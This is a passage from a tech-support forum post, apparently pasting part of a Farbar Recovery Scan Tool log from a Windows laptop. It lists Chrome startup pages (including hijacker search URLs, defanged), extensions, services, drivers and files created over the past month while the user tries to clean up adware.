Chrome:
=======
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3331220&octid=EB_ORIGINAL_CTID&ISID=M6EF061FB-6526-469B-B6FA-79788B78C26B&SearchSource=55&CUI=&UM=6&UP=SP99B2B66A-35FF-47D4-A2C1-379849B5BFA5&SSPV=","hxxps://www.google.com/","hxxp://searchy.easylifeapp.com/"
CHR Profile: C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-05-01]
CHR Extension: (Google Docs) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-05-01]
CHR Extension: (Google Drive) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-05-01]
CHR Extension: (YouTube) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-05-01]
CHR Extension: (Adblock Plus) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-05-01]
CHR Extension: (Pandora) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl [2016-05-01]
CHR Extension: (Google Sheets) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-05-01]
CHR Extension: (SiteAdvisor) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-05-01]
CHR Extension: (Google Docs Offline) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-05-01]
CHR Extension: (Google Mail Checker) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihcahmgecmbnbcchbopgniflfhgnkff [2016-05-01]
CHR Extension: (Text) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\mmfbcljfglbokpmkimbfghdkjmjhdgbg [2016-05-01]
CHR Extension: (The Space ) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nchoeafalnaacdkpoodkjnbogigpjabk [2016-05-01]
CHR Extension: (Chrome Web Store Payments) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-05-01]
CHR Extension: (Gmail) - C:\Users\xains_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-05-01]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-01]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [694464 2016-04-07] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021592 2016-04-05] (Adobe Systems, Incorporated)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2829552 2016-03-08] (Microsoft Corporation)
R2 DAMSvc; C:\Program Files (x86)\Nuance\DragonAssistant3\DragonAssistantMaintenance.exe [4279056 2014-01-27] (Nuance Communications, Inc.)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-01-27] (WildTangent)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [469304 2014-03-26] (Hewlett-Packard Development Company, L.P.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-03-22] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation)
R2 IntelBCAsvc; C:\Program Files\Intel\BCA\pabeSvc64.exe [3020440 2015-11-25] (Intel(R) Corporation)
R2 ISCTAgent; C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe [200168 2013-12-04] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [163592 2016-04-20] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [889704 2016-03-31] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.656.0\McCSPServiceHost.exe [1709096 2016-03-14] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [718248 2016-03-07] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [234192 2016-01-25] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-02-19] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [279488 2016-01-25] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1037048 2016-03-15] (McAfee, Inc.)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2014-01-17] ()
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [896456 2016-03-02] (Intel Security, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [1042304 2016-05-01] (Enigma Software Group USA, LLC.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-04-11] (Synaptics Incorporated)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [874784 2016-04-21] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [15736 2016-04-21] (McAfee, Inc.)
R2 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-04-21] (McAfee, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3816176 2014-01-17] (Intel® Corporation)
S2 InstallerService; "C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [79248 2016-01-29] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-05-01] ()
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [162512 2014-02-14] (Intel Corporation)
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [21408 2013-08-13] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [21920 2013-08-13] ()
R3 INETMON; C:\Windows\System32\Drivers\INETMON.sys [29088 2013-08-13] ()
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [46568 2013-08-13] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-05-01] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [422184 2016-01-29] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351656 2016-01-29] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-01-29] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496368 2016-01-29] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [847608 2016-01-29] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [45728 2016-03-15] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [245096 2016-01-29] (McAfee, Inc.)
R3 NETwNb64; C:\Windows\system32\DRIVERS\Netwbw02.sys [3434464 2014-03-13] (Intel Corporation)
S3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew02.sys [4649440 2013-06-18] (Intel Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [466136 2014-01-14] (Realsil Semiconductor Corporation)
R3 SensorsServiceDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [227840 2014-05-31] (Microsoft Corporation)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-04-11] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-04-11] (Synaptics Incorporated)
R3 VirtualButtons; C:\Windows\System32\drivers\VirtualButtons.sys [32024 2013-10-04] (Intel Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-01 06:52 - 2016-05-01 06:52 - 00034688 _____ C:\Users\xains_000\Downloads\FRST.txt
2016-05-01 06:52 - 2016-05-01 06:52 - 00000000 ____D C:\FRST
2016-05-01 06:51 - 2016-05-01 06:52 - 02377216 _____ (Farbar) C:\Users\xains_000\Downloads\FRST64.exe
2016-05-01 06:43 - 2016-05-01 06:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-05-01 06:43 - 2016-05-01 06:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-05-01 06:43 - 2016-05-01 06:43 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-05-01 06:43 - 2016-05-01 06:43 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-05-01 06:43 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-05-01 06:43 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-05-01 06:43 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-05-01 06:42 - 2016-05-01 06:42 - 22851472 _____ (Malwarebytes ) C:\Users\xains_000\Downloads\mbam-setup-2.2.1.1043.exe
2016-05-01 06:30 - 2016-05-01 06:30 - 00000000 _____ C:\autoexec.bat
2016-05-01 06:29 - 2016-05-01 06:29 - 00022704 _____ C:\Windows\system32\Drivers\EsgScanner.sys
2016-05-01 06:29 - 2016-05-01 06:29 - 00003342 _____ C:\Windows\System32\Tasks\SpyHunter4Startup
2016-05-01 06:29 - 2016-05-01 06:29 - 00001110 _____ C:\Users\xains_000\Desktop\SpyHunter.lnk
2016-05-01 06:29 - 2016-05-01 06:29 - 00000000 ____D C:\Users\xains_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter
2016-05-01 06:29 - 2016-05-01 06:29 - 00000000 ____D C:\Users\xains_000\AppData\Roaming\Enigma Software Group
2016-05-01 06:29 - 2016-05-01 06:29 - 00000000 ____D C:\sh4ldr
2016-05-01 06:29 - 2016-05-01 06:29 - 00000000 ____D C:\Program Files\Enigma Software Group
2016-05-01 06:28 - 2016-05-01 06:28 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\xains_000\Downloads\SpyHunter-Installer.exe
2016-05-01 05:41 - 2016-05-01 05:41 - 00509440 _____ (Tech Support Guy System) C:\Users\xains_000\Downloads\SysInfo.exe
2016-05-01 05:35 - 2016-05-01 05:35 - 00000000 ____D C:\Users\xains_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
2016-05-01 05:34 - 2016-05-01 05:34 - 00002294 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-05-01 05:34 - 2016-05-01 05:34 - 00002282 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-05-01 05:33 - 2016-05-01 06:38 - 00000922 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-01 05:33 - 2016-05-01 06:12 - 00000918 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-05-01 05:33 - 2016-05-01 05:34 - 00000000 ____D C:\Users\xains_000\AppData\Local\Google
2016-05-01 05:33 - 2016-05-01 05:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-05-01 05:33 - 2016-05-01 05:33 - 00987728 _____ (Google Inc.) C:\Users\xains_000\Downloads\ChromeSetup.exe
2016-05-01 05:33 - 2016-05-01 05:33 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-05-01 05:33 - 2016-05-01 05:33 - 00003658 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-05-01 05:30 - 2016-05-01 05:30 - 03581504 _____ C:\Users\xains_000\Downloads\adwcleaner_5.114(1).exe
2016-05-01 04:19 - 2016-05-01 06:13 - 00000000 ____D C:\Program Files (x86)\Steam
2016-05-01 04:19 - 2016-05-01 04:19 - 01380712 _____ C:\Users\xains_000\Downloads\SteamSetup.exe
2016-05-01 04:19 - 2016-05-01 04:19 - 00000982 _____ C:\Users\Public\Desktop\Steam.lnk
2016-05-01 04:19 - 2016-05-01 04:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2016-05-01 03:38 - 2016-05-01 06:04 - 00000000 ____D C:\AdwCleaner
2016-05-01 03:38 - 2016-05-01 03:38 - 03581504 _____ C:\Users\xains_000\Downloads\adwcleaner_5.114.exe
2016-05-01 03:20 - 2016-05-01 03:20 - 00000000 ____D C:\Users\xains_000\AppData\Roaming\hpqLog
2016-05-01 03:13 - 2016-05-01 03:13 - 00001867 _____ C:\Users\Public\Desktop\McAfee AntiVirus.lnk
2016-05-01 03:13 - 2016-05-01 03:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-05-01 03:03 - 2016-05-01 03:03 - 00000000 ____D C:\Users\xains_000\AppData\Local\tkdata
2016-05-01 03:03 - 2015-05-19 13:59 - 00207208 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2016-05-01 03:02 - 2016-05-01 03:02 - 00003080 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-05-01 03:02 - 2016-05-01 03:02 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-05-01 03:02 - 2016-05-01 03:02 - 00000000 ____D C:\ProgramData\TrueKey
2016-05-01 03:02 - 2016-05-01 03:02 - 00000000 ____D C:\ProgramData\Intel Security
2016-05-01 03:01 - 2016-05-01 03:01 - 00001217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\True Key.lnk
2016-05-01 03:01 - 2016-05-01 03:01 - 00000000 ____D C:\Program Files\Intel Security
2016-05-01 02:58 - 2016-05-01 03:03 - 00000000 ____D C:\Program Files\McAfee
2016-05-01 02:58 - 2016-05-01 02:58 - 00000000 ____D C:\Program Files\McAfee.com
2016-05-01 02:57 - 2016-05-01 02:57 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-05-01 02:53 - 2016-05-01 02:53 - 08320264 _____ (McAfee, Inc.) C:\Users\xains_000\Downloads\Setup_serial_SBb5frQzU4srkjxZc2o9OQ2_key.exe
2016-05-01 02:53 - 2016-01-25 16:29 - 00279488 _____ (McAfee, Inc.) C:\Windows\system32\mfevtps.exe
2016-05-01 02:13 - 2014-04-15 19:35 - 00028352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2016-05-01 02:13 - 2014-04-15 19:34 - 00029888 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2016-05-01 01:59 - 2016-05-01 03:46 - 00000000 ____D C:\Users\xains_000\AppData\Local\Steam
2016-05-01 01:59 - 2016-05-01 01:59 - 00000000 ____D C:\Users\xains_000\AppData\Local\CEF
2016-05-01 01:45 - 2016-03-30 20:54 - 25817600 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-05-01 01:45 - 2016-03-30 20:31 - 02892800 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-05-01 01:45 - 2016-03-30 20:28 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-05-01 01:45 - 2016-03-30 20:25 - 06052352 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-05-01 01:45 - 2016-03-30 20:17 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
 
#14 ·
Second Half:

2016-05-01 01:45 - 2016-03-30 20:03 - 20352512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-05-01 01:45 - 2016-03-30 19:56 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2016-05-01 01:45 - 2016-03-30 19:56 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-05-01 01:45 - 2016-03-30 19:55 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-05-01 01:45 - 2016-03-30 19:53 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-05-01 01:45 - 2016-03-30 19:51 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-05-01 01:45 - 2016-03-30 19:50 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-05-01 01:45 - 2016-03-30 19:45 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-05-01 01:45 - 2016-03-30 19:45 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-05-01 01:45 - 2016-03-30 19:43 - 00806400 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-05-01 01:45 - 2016-03-30 19:43 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-05-01 01:45 - 2016-03-30 19:43 - 00379392 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-05-01 01:45 - 2016-03-30 19:42 - 02131968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-05-01 01:45 - 2016-03-30 19:39 - 15415808 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-05-01 01:45 - 2016-03-30 19:30 - 04611072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-05-01 01:45 - 2016-03-30 19:30 - 02596864 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-05-01 01:45 - 2016-03-30 19:30 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-05-01 01:45 - 2016-03-30 19:30 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2016-05-01 01:45 - 2016-03-30 19:27 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-05-01 01:45 - 2016-03-30 19:24 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-05-01 01:45 - 2016-03-30 19:23 - 02056192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-05-01 01:45 - 2016-03-30 19:23 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-05-01 01:45 - 2016-03-30 19:23 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-05-01 01:45 - 2016-03-30 19:21 - 13811712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-05-01 01:45 - 2016-03-30 19:18 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-05-01 01:45 - 2016-03-30 19:06 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-05-01 01:45 - 2016-03-30 19:05 - 02121216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-05-01 01:45 - 2016-03-30 19:02 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-05-01 01:45 - 2016-03-30 19:00 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-05-01 01:45 - 2016-02-08 16:29 - 00099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-05-01 01:45 - 2016-02-08 14:14 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-05-01 01:45 - 2016-02-08 13:15 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-05-01 01:45 - 2015-11-09 20:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-05-01 01:45 - 2015-11-09 20:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-05-01 01:45 - 2015-11-08 18:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-05-01 01:45 - 2015-09-10 13:18 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-05-01 01:45 - 2015-09-10 12:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-05-01 01:45 - 2015-09-10 12:17 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-05-01 01:45 - 2015-09-10 12:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-05-01 01:45 - 2015-07-16 16:36 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-05-01 01:45 - 2015-07-16 15:50 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-05-01 01:45 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2016-05-01 01:45 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-05-01 01:45 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2016-05-01 01:45 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-05-01 01:45 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-05-01 01:45 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-05-01 01:45 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-05-01 01:37 - 2016-05-01 01:37 - 00003344 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-05-01 01:37 - 2016-05-01 01:37 - 00000000 ____D C:\Program Files\Common Files\AV
2016-04-26 16:52 - 2016-04-26 16:52 - 00000000 ____D C:\Users\xains_000\AppData\Local\Macromedia
2016-04-26 16:51 - 2016-05-01 06:32 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-04-26 16:51 - 2016-05-01 06:10 - 00000000 ____D C:\Program Files\TrueKey
2016-04-26 16:51 - 2016-04-26 16:51 - 00003718 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-04-22 15:44 - 2016-05-01 01:34 - 00000000 ___RD C:\Users\xains_000\Creative Cloud Files
2016-04-22 15:44 - 2016-04-22 15:44 - 00000000 ____D C:\ProgramData\boost_interprocess
2016-04-22 15:25 - 2016-05-01 05:59 - 00000000 ____D C:\Users\xains_000\AppData\Local\CrashDumps
2016-04-22 15:25 - 2016-01-22 04:01 - 22365992 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-04-22 15:25 - 2016-01-22 03:11 - 19794896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-04-22 15:25 - 2016-01-22 01:25 - 14467072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-04-22 15:25 - 2016-01-22 01:14 - 12879360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-04-22 15:25 - 2016-01-22 01:07 - 02778624 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-04-22 15:25 - 2016-01-10 15:37 - 00442720 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-04-22 15:25 - 2016-01-10 14:39 - 00332640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-04-22 15:25 - 2016-01-10 13:02 - 00987648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-04-22 15:25 - 2016-01-10 12:56 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2016-04-22 15:25 - 2016-01-10 12:43 - 00801792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-04-22 15:25 - 2015-11-09 19:25 - 01048576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
